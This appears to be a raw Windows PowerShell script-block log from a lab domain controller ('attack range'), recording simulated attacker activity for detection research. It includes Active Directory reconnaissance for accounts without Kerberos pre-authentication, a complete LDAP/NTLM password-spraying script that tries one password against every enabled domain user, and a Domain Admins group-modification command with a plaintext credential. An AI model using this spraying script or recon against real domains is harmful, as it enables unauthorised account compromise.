4104152150x0108574Microsoft-Windows-PowerShell/Operationalwin-dc-mhaag-attack-range-325.attackrange.local11Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name1273b558-b742-4d8f-885a-0f98eb24d197
4104152150x0108560Microsoft-Windows-PowerShell/Operationalwin-dc-mhaag-attack-range-325.attackrange.local11Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name
e973c7e7-2850-4908-bd49-6eb1069051a2
4104132150x0108402Microsoft-Windows-PowerShell/Operationalwin-dc-mhaag-attack-range-325.attackrange.local11{if ("NTLM".ToLower() -NotIn @("ntlm","kerberos")) {
Write-Host "Only 'NTLM' and 'Kerberos' auth methods are supported"
exit 1
}
$DomainUsers = Get-ADUser -LDAPFilter '(&(sAMAccountType=805306368)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' -Server $env:UserDnsDomain | Select-Object -ExpandProperty SamAccountName
[System.Reflection.Assembly]::LoadWithPartialName("System.DirectoryServices.Protocols") | Out-Null
$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier("$env:UserDnsDomain",389)
$DomainUsers | Foreach-Object {
$user = $_
$password = 'P@ssw0rd!'
$credz = new-object System.Net.NetworkCredential($user, $password, "$env:UserDnsDomain")
$conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::NTLM)
try {
Write-Host " [-] Attempting ${password} on account ${user}."
$conn.bind()
# if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success
Write-Host " [!] ${user}:${password} are valid credentials!"
} catch {
Write-Host $_.Exception.Message
}
}
Write-Host "End of password spraying"}d83e6dcb-1759-4496-8c12-aa5b75634bc1
4104132150x0108400Microsoft-Windows-PowerShell/Operationalwin-dc-mhaag-attack-range-325.attackrange.local11& {if ("NTLM".ToLower() -NotIn @("ntlm","kerberos")) {
Write-Host "Only 'NTLM' and 'Kerberos' auth methods are supported"
exit 1
}
$DomainUsers = Get-ADUser -LDAPFilter '(&(sAMAccountType=805306368)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' -Server $env:UserDnsDomain | Select-Object -ExpandProperty SamAccountName
[System.Reflection.Assembly]::LoadWithPartialName("System.DirectoryServices.Protocols") | Out-Null
$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier("$env:UserDnsDomain",389)
$DomainUsers | Foreach-Object {
$user = $_
$password = 'P@ssw0rd!'
$credz = new-object System.Net.NetworkCredential($user, $password, "$env:UserDnsDomain")
$conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::NTLM)
try {
Write-Host " [-] Attempting ${password} on account ${user}."
$conn.bind()
# if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success
Write-Host " [!] ${user}:${password} are valid credentials!"
} catch {
Write-Host $_.Exception.Message
}
}
Write-Host "End of password spraying"}4e535179-eaee-454b-b9f6-2d671855577c
4104152150x0106969Microsoft-Windows-PowerShell/Operationalwin-dc-mhaag-attack-range-325.attackrange.local11{get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE}}5e78d561-dd73-454e-b911-f751b5e641ae
4104152150x0106967Microsoft-Windows-PowerShell/Operationalwin-dc-mhaag-attack-range-325.attackrange.local11& {get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE}}5d5adf00-3b7e-46f2-8309-4e218c417bdc
4104152150x0105979Microsoft-Windows-PowerShell/Operationalwin-dc-mhaag-attack-range-325.attackrange.local11{$PWord = ConvertTo-SecureString -String password -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList domain\super_user, $PWord
if((Get-ADUser remove_user -Properties memberof).memberof -like "CN=Domain Admins*"){
Remove-ADGroupMember -Identity "Domain Admins" -Members remove_user -Credential $Credential -Confirm:$False
} else{
write-host "Error - Make sure remove_user is in the domain admins group" -foregroundcolor Red
}}4801f4b9-5f12-451d-994f-34c92379dd2e
4104152150x0105977Microsoft-Windows-PowerShell/Operationalwin-dc-mhaag-attack-range-325.attackrange.local11& {$PWord = ConvertTo-SecureString -String password -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList domain\super_user, $PWord
if((Get-ADUser remove_user -Properties memberof).memberof -like "CN=Domain Admins*"){
Remove-ADGroupMember -Identity "Domain Admins" -Members remove_user -Credential $Credential -Confirm:$False
} else{
write-host "Error - Make sure remove_user is in the domain admins group" -foregroundcolor Red
}}d4efbca1-6f2e-4b50-a5a9-308cc98b41ca
4104152150x0105633Microsoft-Windows-PowerShell/Operationalwin-dc-mhaag-attack-range-325.attackrange.local11get-aduser3f5fa968-847e-4de9-80f8-8f10d6030491